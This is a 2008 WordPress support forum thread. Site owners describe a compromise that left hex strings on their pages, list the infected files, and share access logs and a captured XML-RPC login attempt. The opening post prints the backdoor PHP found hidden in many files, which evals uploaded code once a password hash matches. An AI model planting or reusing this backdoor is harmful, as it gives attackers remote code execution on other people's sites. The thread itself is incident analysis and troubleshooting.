Title: Theme-editing exploit? Last modified: August 19, 2016 --- # Theme-editing exploit? * [lucent](https://wordpress.org/support/users/lucent/) * (@lucent) * [18 years, 1 month ago](https://wordpress.org/support/topic/theme-editing-exploit/) * My WordPress installation has been exploited before by the various XML-RPC edits, but I believe I’d cleaned up everything. Today I noticed 3 distinctive hex strings at the top of every page. WordPress is otherwise fully functional. * ``` c1608e58b7a40647381b4667630bf061 82d58bfc8dc7a2fa985939b01d5b694f 69175bee376c12eba6ddbd1f632a7f10 ``` * Google results find others a victim of the same exploit. Overwriting all files with another installation does not change this, suggesting it involves a theme not overwritten. I use a modified Hemingway. * The following files are compromised: * ``` fixed_wp-blog-header.php wp-admin/includes/fixed_schema.php wp-admin/import/fixed_rss.php wp-admin/fixed_edit-form-advanced.php wp-content/fixed_wp-cache-config.php wp-content/plugins/wp-super-cache/plugins/fixed_searchengine.php wp-content/plugins/wp-super-cache/fixed_wp-cache-base.php wp-content/plugins/geourl/fixed_geourl.php wp-content/plugins/ald-meebome/fixed_admin.inc.php wp-content/plugins/akismet/fixed_akismet.php wp-content/plugins/fixed_hello.php wp-content/themes/default/images/fixed_header-img.php wp-content/themes/default/fixed_header.php wp-content/themes/hemingway/blocks/fixed_related_posts.php wp-content/themes/classic/fixed_header.php wp-content/themes/quentin/fixed_header.php wp-includes/js/fixed_wp-ajax-js.php wp-includes/js/tinymce/plugins/spellchecker/includes/fixed_general.php wp-includes/js/tinymce/plugins/spellchecker/fixed_config.php wp-includes/js/tinymce/plugins/spellchecker/classes/utils/fixed_Logger.php wp-includes/js/tinymce/plugins/spellchecker/classes/fixed_TinyPspellShell.class.php wp-includes/js/tinymce/langs/fixed_wp-langs.php wp-includes/js/tinymce/fixed_tiny_mce_config.php wp-includes/fixed_pluggable-functions.php wp-stats.php ``` * The exploit was apparently triggered by the following visit which occurred after I had installed 2.5: * ``` web.moea.unam.mx - - [14/Apr/2008:14:45:52 -0600] "POST /wp-login.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)" mostro.politicas.unam.mx - - [14/Apr/2008:14:45:55 -0600] "GET /wp-admin/theme-editor.php HTTP/1.0" 200 19961 "-" "Opera/9.01 (Windows NT 5.0; U; en)" mostro.politicas.unam.mx - - [14/Apr/2008:14:45:59 -0600] "GET /wp-admin/theme-editor.php?file=wp-content/themes/hemingway/index.php&theme=Hemingway HTTP/1.0" 200 9922 "-" "Opera/9.01 (Windows NT 5.0; U; en)" web.moea.unam.mx - - [14/Apr/2008:14:46:03 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)" web.moea.unam.mx - - [14/Apr/2008:14:46:07 -0600] "POST / HTTP/1.0" 200 12570 "-" "Opera/9.01 (Windows NT 5.0; U; en)" web.moea.unam.mx - - [14/Apr/2008:14:46:11 -0600] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)" mostro.politicas.unam.mx - - [14/Apr/2008:14:46:14 -0600] "GET /wp-login.php?action=logout HTTP/1.0" 302 - "-" "Opera/9.01 (Windows NT 5.0; U; en)" ``` * It’s entirely possible I’ve had these files for some time and they were implanted by an earlier exploit, but did not express themselves until a new perhaps theme- editing exploit reactivated them. I’m not familiar at all with WordPress’s workings or its security. * I believe all of the files contain the same code, buffered with many blank lines before and after. The “PASSWD” may be different in different files: * ``` "; testdata('start'); if (md5($_POST["p"]) == PASSWD) { if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"), $HTTP_POST_FILES["s"]["size"])) { if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code)) { testdata('save_ok'); }; //eval($code); } else { testdata('save_fail'); }; if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) { eval($code); testdata('ok'); } else { testdata('fail'); }; } else { testdata('pass'); }; testdata('end'); echo ""; ?> ``` Viewing 11 replies - 1 through 11 (of 11 total) * [whooami](https://wordpress.org/support/users/whooami/) * (@whooami) * [18 years, 1 month ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-744705) * once again, what you pasted is not the hack.. its simply the file access. I stress this because its nearly identical to another post here. * You cannot, once again, you **CANNOT**, open wp-admin/theme-editor without having the proper credentials. * If you examine what you pasted, you can see that they **logged in**. * Install my plugin that provides logging..if you want to see exactly what is going on * [http://www.village-idiot.org/post-logger/](http://www.village-idiot.org/post-logger/) * Im also going to go out on a limb and say that since Ive seen that exact thing on older installs that were exploited, that your password was compromised some time ago. * Here’s my bet. * You install my logging password. * you change your password. * within a day, you will see older exploits attempts that worked on the older versions for grabbing your admin password. * Thread Starter [lucent](https://wordpress.org/support/users/lucent/) * (@lucent) * [18 years, 1 month ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-744712) * Thank you. That explanation does seem most likely. I have installed your plugin and changed my password and will watch the log. * [b-rad](https://wordpress.org/support/users/b-rad/) * (@b-rad) * [18 years, 1 month ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745000) * I received an email from Google saying one of my sites (only a wordpress blog) was compromised and that any results for this site would now feature a warning from Google. Long story short, I discovered the exact same code in my blog and removed it. This seems like a definite exploit in wordpress (2.3.3 here). * [triptol](https://wordpress.org/support/users/triptol/) * (@triptol) * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745036) * I had the same problem. I only found out after I upgraded to 2.5.1 and decided to completely reinstall my blog (except for the database). * After a little bit more than half a week today I finally got lucky with the post- logger. * ``` metaWeblog.getRecentPosts C6CE3FFB3174106584CBB250C0B0519BF4E294 UserName PassWord 1 78.90.14.123 /xmlrpc.php May 11, 2008, 11:20 pm ``` * There it was my (now invalid) password from some host in Bulgaria. * Now what should I do with this information? * [whooami](https://wordpress.org/support/users/whooami/) * (@whooami) * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745037) * youre using my [post-logger](http://www.village-idiot.org/post-logger) plugin? 🙂 * That, btw, should be an old exploit. * I am SO glad to know that that captures xmlrpc requests. * > Now what should I do with this information? * Like I said, that should be an old exploit. * If you want though, you can pass that on to [security@wordpress.org](https://wordpress.org/support/topic/theme-editing-exploit/security@wordpress.org?output_format=md) and ref. this thread. Rest assured, that if it isnt, Matt will come along and edit this thread. * — * And good for you, for not only upgrading but for being proactive, and no doubt, curious enough, to use my plugin to locate the ‘presumed’ entry point. WP needs more warriors. * [sonnata](https://wordpress.org/support/users/sonnata/) * (@sonnata) * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745038) * whooami, I downloaded your post-logger, but am not sure how to install it. When I go to my WordPress admin page, I get this code: c1608e58b7a40647381b4667630bf061 82d58bfc8dc7a2fa985939b01d5b694f 69175bee376c12eba6ddbd1f632a7f10 * Same thing I’m seeing when I try to go to my blog page. * I do have ftp access to the server & have Fantastico through my host. If I install a new version of WordPress over my old one, will my posts remain intact? * [whooami](https://wordpress.org/support/users/whooami/) * (@whooami) * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745039) * sonnata, * I havent a clue why you are seeing that. But its showing up in google’s cache of your site from May 6. * [http://64.233.167.104/search?q=cache:69PNZCe1jk4J:www.homeproductsnmore.net/+http://www.homeproductsnmore.net/&hl=en&ct=clnk&cd=1&gl=us](http://64.233.167.104/search?q=cache:69PNZCe1jk4J:www.homeproductsnmore.net/+http://www.homeproductsnmore.net/&hl=en&ct=clnk&cd=1&gl=us) * Youre worrying about apples and oranges — apples being those numbers, and oranges being my plugin. * In other words, theyre not related. * You need to fix the problem with your blog before installing any plugins. * > If I install a new version of WordPress over my old one, will my posts remain > intact? * If you can follow [instructions](http://codex.wordpress.org/Upgrading_WordPress), of course they will. But, like I just indicated, what you are seeing might be a sign of something that necessitates more than simple upgrade. * [sonnata](https://wordpress.org/support/users/sonnata/) * (@sonnata) * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745050) * I did not have your plugin installed before this problem occurred. I was hoping it would help me track down the cause of it. * I have tried upgrading WordPress according to the link you gave me, with both the [Three Step Upgrade](http://codex.wordpress.org/Upgrading_WordPress) as well as the [more detailed upgrade instructions](http://codex.wordpress.org/Upgrading_WordPress_Extended). * Neither worked. Still still seeing this code on both /wp-admin/ page as well as [http://www.homeproductsnmore.net/](http://www.homeproductsnmore.net/) * c1608e58b7a40647381b4667630bf061 82d58bfc8dc7a2fa985939b01d5b694f 69175bee376c12eba6ddbd1f632a7f10 * BTW, this is the only thing that appears on either psge. I have backed up my database. Would moving it to another host & reinstalling wordpress there fix this? I’m at a loss as to what to do at this point. * Anonymous User * (@anonymized-176544) * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745054) * Same problem for me today. Files were named co_wp-app.php , co_404.php, etc…. If I delete xmlrpc.php, what would be the effect on these attacks? Would I be able to use pingback or receive pingback? * [whooami](https://wordpress.org/support/users/whooami/) * (@whooami) * [18 years ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745055) * if you remove or rename xmlrpc.php you will not be able to receive pingbacks. I dont know about sending them, though. Trackbacks should still work. * [jingan-eugen](https://wordpress.org/support/users/jingan-eugen/) * (@jingan-eugen) * [17 years, 11 months ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745065) * You should check this too: [http://www.bloggerguide.net/blog-platform/wordpress/wordpress-exploit-giving-backlinks-redirects-and-headaches-but-no-visitors/](http://www.bloggerguide.net/blog-platform/wordpress/wordpress-exploit-giving-backlinks-redirects-and-headaches-but-no-visitors/) Viewing 11 replies - 1 through 11 (of 11 total) The topic ‘Theme-editing exploit?’ is closed to new replies. ## Tags * [exploit](https://wordpress.org/support/topic-tag/exploit/) * In: [Requests and Feedback](https://wordpress.org/support/forum/requests-and-feedback/) * 11 replies * 7 participants * Last reply from: [jingan-eugen](https://wordpress.org/support/users/jingan-eugen/) * Last activity: [17 years, 11 months ago](https://wordpress.org/support/topic/theme-editing-exploit/#post-745065) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics